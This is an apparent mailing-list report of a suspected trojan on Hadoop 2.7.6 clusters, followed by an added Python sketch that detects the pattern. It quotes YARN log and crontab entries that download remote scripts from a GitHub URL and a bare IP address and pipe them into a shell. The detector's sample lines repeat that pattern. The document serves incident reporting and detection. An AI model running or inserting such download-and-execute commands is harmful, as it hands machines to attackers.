Dear all,

we downloaded
http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz
and installed the unpacked files as described. The md5 check was correct.

After a few days we found the following entries in the YARN log files:

    2018-06-29 05:37:21,490 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1530169168373_1580_01_000001 : wget -q -O - https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash
    ...
    2018-06-29 05:39:54,152 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1530169168373_1583_01_000001 : wget -q -O - https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & disown

In the crontab we found the following single entry:

    * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1

We installed hadoop 2.7.6 on two separate machines and get the same behaviour. This
all looks like a trojan is working. What do you say to this issue?

Kind regards,
Cliff Mattern
--
Clifford Mattern
AlphaCarina Software GmbH
Taunusturm 18.OG
Taunustor 1
60310 Frankfurt am Main
Tel.: +49 (0)69 24 43 42-4395
Fax: +49 (0)69 24 43 42-4150
e-Mail: clifford.matt...@alphacarina.de
Internet: https://alphacarina.de/
HRB No. 2339 • Commercial Register Deggendorf
Managing Director: Dipl.-Inf. Stephan Iglhaut
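
Added example, not part of the original message: a Python sketch that scans ResourceManager log lines in the AMLauncher format quoted above, and user-crontab lines, for commands that download a script and pipe it straight into a shell. The function names, the regular expressions and the sample lines (with example.invalid hosts and placeholder container ids) are assumptions constructed for illustration.

```python
import re

# ResourceManager AMLauncher line format, as quoted in the message above.
LAUNCH_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) INFO "
    r"org\.apache\.hadoop\.yarn\.server\.resourcemanager\.amlauncher\.AMLauncher: "
    r"Command to launch container (?P<container>container_\w+) : (?P<cmd>.*)$")
# Download tool whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba|da|z|k)?sh\b")
URL_RE = re.compile(r"https?://[^\s|'\"]+")

def scan_rm_log(lines):
    """Return AM launch commands that fetch a script and pipe it to a shell."""
    findings = []
    for line in lines:
        m = LAUNCH_RE.match(line.strip())
        if m and PIPE_TO_SHELL_RE.search(m["cmd"]):
            findings.append({"time": m["ts"], "container": m["container"],
                             "urls": URL_RE.findall(m["cmd"])})
    return findings

def scan_crontab(lines):
    """Same check for user-crontab entries (5 schedule fields + command)."""
    hits = []
    for line in lines:
        fields = line.strip().split(None, 5)
        if len(fields) == 6 and fields[0][0] != "#" and PIPE_TO_SHELL_RE.search(fields[5]):
            hits.append({"schedule": " ".join(fields[:5]),
                         "urls": URL_RE.findall(fields[5])})
    return hits

# Constructed sample input; hosts and container ids are placeholders.
_P = "org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container "
SAMPLE_RM_LOG = [
    "2018-01-01 10:00:00,001 INFO " + _P + "container_1500000000000_0001_01_000001 : "
    "$JAVA_HOME/bin/java org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout",
    "2018-01-01 10:05:00,002 INFO " + _P + "container_1500000000000_0002_01_000001 : "
    "wget -q -O - https://files.example.invalid/a.sh | bash",
    "2018-01-01 10:07:00,003 INFO " + _P + "container_1500000000000_0003_01_000001 : "
    "curl -s http://files.example.invalid/b.sh | sh & disown",
]
SAMPLE_CRONTAB = [
    "# constructed crontab",
    "0 3 * * * /usr/local/bin/backup.sh",
    "* * * * * wget -q -O - http://files.example.invalid/c.sh | sh > /dev/null 2>&1",
]

if __name__ == "__main__":
    print(scan_rm_log(SAMPLE_RM_LOG), scan_crontab(SAMPLE_CRONTAB))
```

The ordinary MRAppMaster launch line and the backup cron job are not reported; only the three download-and-execute commands are.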